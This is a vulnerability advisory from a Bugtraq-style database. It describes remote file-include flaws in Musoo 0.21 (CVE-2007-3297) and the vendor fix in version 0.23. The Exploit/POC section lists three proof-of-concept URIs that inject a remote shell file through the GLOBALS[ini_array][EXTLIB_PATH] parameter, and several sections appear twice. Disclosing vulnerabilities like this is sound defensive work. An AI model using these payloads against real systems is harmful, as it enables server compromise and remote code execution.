Musoo GLOBALS[ini_array] Parameter Remote File Include Vulnerabilities
BID:24554
Info
Musoo GLOBALS[ini_array] Parameter Remote File Include Vulnerabilities
| Bugtraq ID: | 24554 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-3297 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 20 2007 12:00AM |
| Updated: | May 07 2015 05:37PM |
| Credit: | GoLd_M is credited with the discovery of the issue. |
| Vulnerable: |
Musoo Musoo 0.21 |
| Not Vulnerable: |
Musoo Musoo 0.23 |
Discussion
Musoo GLOBALS[ini_array] Parameter Remote File Include Vulnerabilities
MUSOO is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
MUSOO 0.21 is vulnerable; other versions may also be affected.
MUSOO is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
MUSOO 0.21 is vulnerable; other versions may also be affected.
Exploit / POC
Musoo GLOBALS[ini_array] Parameter Remote File Include Vulnerabilities
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/[path]/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
http://www.example.com/[path]/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
http://www.example.com/[path]/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/[path]/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
http://www.example.com/[path]/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
http://www.example.com/[path]/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
Solution / Fix
Musoo GLOBALS[ini_array] Parameter Remote File Include Vulnerabilities
Solution:
The vendor has released version 0.23 to address this issue.
Musoo Musoo 0.21
Solution:
The vendor has released version 0.23 to address this issue.
Musoo Musoo 0.21
-
Musoo musoo-0.23.tar.gz
http://freshmeat.net/redir/musoo/65735/url_tgz/musoo-0.23.tar.gz
References
Musoo GLOBALS[ini_array] Parameter Remote File Include Vulnerabilities
References:
References:
- Musoo Homepage (Musoo)
- Release focus: Major security fixes (Musoo)